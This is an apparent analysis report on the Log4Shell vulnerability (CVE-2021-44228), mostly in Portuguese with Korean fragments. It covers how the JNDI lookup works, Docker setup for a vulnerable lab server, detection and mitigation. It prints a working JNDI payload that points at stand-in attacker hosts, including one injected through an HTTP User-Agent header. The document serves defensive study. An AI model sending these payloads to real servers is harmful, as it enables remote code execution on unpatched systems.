
CVE-2021-44228
이글루코퍼레이션 원치현 Log4shell 분석보고서
CVE-2021-44228 Log4j é uma biblioteca gratuita e de código aberto da Apache Foundation, baseada em Java, que permite o registro de logs em vários serviços Java. Ela utiliza a funcionalidade de lookup JNDI para descobrir e referenciar dados e objetos JNDI, usando recursos encontrados através do LDAP (porta 1389) e JNDI.
Download da imagem Docker do servidor vulnerável Asudo git clone sudo docker build . -t vulnerable-app Cria uma nova imagem com o nome vulnerable-app no diretório atual, gerando a imagem Docker.
github.com/welk
Encerrar servidor vulnerável não utilizado docker ps -a Verifica todas as imagens Docker em execução docker container id Verifica o ID do contêiner
Log4Shell (CVE-2021-44228) é uma vulnerabilidade de Execução Remota de Código (RCE) encontrada na biblioteca Apache Log4j.
Atacantes podem usar payloads maliciosos para executar código arbitrário, podendo causar danos generalizados.
Este relatório analisa o princípio, impacto, casos de exploração, detecção e métodos de resposta do Log4Shell.
Log4Shell permite que um atacante execute código malicioso em um servidor remoto explorando uma falha na funcionalidade de lookup JNDI (Java Naming and Directory Interface).
O atacante pode explorar a vulnerabilidade apenas registrando a seguinte string no log:
${jndi:ldap://attacker.com:1389/exploit}
A vulnerabilidade Log4Shell afetou inúmeras empresas e serviços que usam Log4j.
O atacante podia controlar o servidor inserindo a seguinte string no chat do Minecraft:
복사
편집
${jndi:ldap://attacker.com:1389/exploit}
Quando o servidor registrava essa string, o JNDI Lookup executava código malicioso do servidor do atacante.
Inserir payload malicioso em campos registrados em log, como User-Agent, Referer, X-Forwarded-For de requisições HTTP.
Exemplo:
복사
편집
GET / HTTP/1.1
Host: victim.com
User-Agent: ${jndi:ldap://malicious.com:1389/exploit}
✅ Uso de scanners de segurança
✅ Verificação de arquivos de log
${jndi:ldap://...} forem encontrados nos logs, é necessária uma resposta imediata.✅ Monitoramento de rede
✅ Medidas imediatas
-Dlog4j2.formatMsgNoLookups=true
jndi:ldap:// no firewall e IDS/IPS.✅ Medidas de segurança de longo prazo
| Versão do Log4j | Medida de Resposta |
|---|---|
| 2.0-beta9 ~ 2.14.1 | Vulnerável, necessita atualização |
| 2.15.0 | Desativação padrão do JNDI Lookup |
| 2.16.0 | Remoção completa da funcionalidade JNDI |
| 2.17.0 | Medidas adicionais de reforço de segurança |
✅ Recomenda-se atualizar para a versão mais recente (2.17.1 ou superior)!
Log4Shell (CVE-2021-44228) é considerada uma das vulnerabilidades de segurança mais graves dos últimos anos. ✅ É essencial corrigir rapidamente sistemas vulneráveis e realizar monitoramento contínuo de segurança. ✅ Todas as aplicações que usam Log4j devem passar por verificações de segurança.
| Item | Descrição |
|---|
| Nome da vulnerabilidade | Log4Shell |
| Número CVE | CVE-2021-44228 |
| Tipo de vulnerabilidade | Execução Remota de Código (RCE) |
| Versões afetadas | Log4j 2.0-beta9 ~ 2.14.1 |
| Versão corrigida | Log4j 2.15.0 ou superior |
| Dificuldade de ataque | Baixa (explorável apenas com entrada simples de string) |
| Severidade | 🔥 Crítico (CVSS 10.0) |